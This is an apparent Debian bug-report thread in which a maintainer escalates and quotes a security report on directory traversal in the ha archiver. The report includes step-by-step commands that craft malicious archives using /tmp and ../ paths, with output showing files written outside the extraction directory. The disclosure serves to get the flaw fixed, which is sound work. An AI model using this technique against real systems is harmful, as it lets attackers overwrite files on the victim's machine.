package ha severity 774954 grave tag 774954 +help thanks > ha is susceptible to directory traversal vulnerabilities. While > extracting an archive, it will happily use absolute and relative paths > taken from the archive. This can be exploited by a malicious archive to > write files outside the current directory.
This is a serious issue, which IMHO makes this package unfit for release. I don't have time nor qualification to deal with it properly, so any help would be welcome. Thanks. On Fri, Jan 9, 2015, at 13:32, Alexander Cherepanov wrote: > Package: ha > Version: 0.999p+dfsg-5 > Tags: security > > ha is susceptible to directory traversal vulnerabilities. While > extracting an archive, it will happily use absolute and relative paths > taken from the archive. This can be exploited by a malicious archive to > write files outside the current directory. > > ha seems to store file names separately from their paths. Directory > traversals are possible through both of the parts. > > 1. Through file name part. > > A sample archive could be prepared in following way: > > $ touch XtmpXabs XXXrel > $ ha a test.ha XtmpXabs XXXrel > $ sed -i 's|XtmpXabs|/tmp/abs|g;s|XXXrel|../rel|g' test.ha > $ rm XtmpXabs XXXrel > > Then check it works: > > $ ls /tmp/abs ../rel > ls: cannot access /tmp/abs: No such file or directory > ls: cannot access ../rel: No such file or directory > > $ ha lf test.ha > HA 0.999� Copyright (c) 1995 Harri Hirvola > > Archive : test.ha (2 files) > > filename original compressed rate date time m > CRC-32 path > attr > =========================================================================== > /tmp/abs 0 0 100.0 % 2015-01-09 15:24 > CPY > 00000000 (none) > -rw-r--r-- > --------------------------------------------------------------------------- > ../rel 0 0 100.0 % 2015-01-09 15:24 > CPY > 00000000 (none) > -rw-r--r-- > =========================================================================== > 2 0 0 100.0 % > > $ ha x test.ha > HA 0.999� Copyright (c) 1995 Harri Hirvola > > Archive : test.ha (2 files) > > Unpacking CPY 100 % /tmp/abs > Unpacking CPY 100 % ../rel > > $ ls /tmp/abs ../rel > ../rel /tmp/abs > > 2. Through path part. > > A sample archive could be prepared in following way: > > $ mkdir Xtmp/ XX/ > $ touch Xtmp/abs XX/rel > $ ha a test.ha Xtmp/abs XX/rel > $ sed -i 's|Xtmp|/tmp|g;s|XX|..|g' test.ha > $ rm -r Xtmp/ XX/ > > Then check it works: > > $ ls /tmp/abs ../rel > ls: cannot access /tmp/abs: No such file or directory > ls: cannot access ../rel: No such file or directory > > $ ha lf test.ha > HA 0.999� Copyright (c) 1995 Harri Hirvola > > Archive : test.ha (2 files) > > filename original compressed rate date time m > CRC-32 path > attr > =========================================================================== > abs 0 0 100.0 % 2015-01-09 15:29 > CPY > 00000000 /tmp/ > -rw-r--r-- > --------------------------------------------------------------------------- > rel 0 0 100.0 % 2015-01-09 15:29 > CPY > 00000000 ../ > -rw-r--r-- > =========================================================================== > 2 0 0 100.0 % > > $ ha x test.ha > HA 0.999� Copyright (c) 1995 Harri Hirvola > > Archive : test.ha (2 files) > > Unpacking CPY 100 % /tmp/abs > Unpacking CPY 100 % ../rel > > $ ls /tmp/abs ../rel > ../rel /tmp/abs > > -- > Alexander Cherepanov -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org